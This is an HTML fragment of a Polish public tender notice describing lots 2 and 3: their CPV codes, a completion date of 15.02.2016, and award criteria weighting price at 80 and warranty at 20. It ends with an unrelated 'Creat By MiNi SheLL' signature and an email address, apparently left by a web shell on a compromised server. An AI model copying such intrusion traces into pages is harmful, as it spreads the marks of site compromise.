Wykonawca składający ofertę na część 2 zamówienia  podaje w formularzu oferty w pk. 2 cenę za realizację danej części zamówienia i załącza do oferty  zestawienie oferowanego sprzętu z podaniem cen jednostkowych poszczególnych elementów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji i rękojmi - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa, montaż  i uruchomienie sprzętu elektronicznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres  przedmiotowy Część III zamówienia  obejmuje:
Dostawę  i instalację i uruchomienie  sprzętu elektronicznego  - zgodnie z opisem  w załączniku nr 11 do SIWZ  Zestawienie wyposażenia -  sprzęt elektroniczny. 
Wykonawca składający ofertę na część 3 zamówienia podaje w formularzu oferty w pk.2 cenę za realizację danej części zamówienia i załącza do oferty  zestawienie oferowanego sprzętu z podaniem cen jednostkowych poszczególnych elementów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 48.82.00.00-2, 32.42.00.00-3, 32.32.46.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji i rękojmi - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com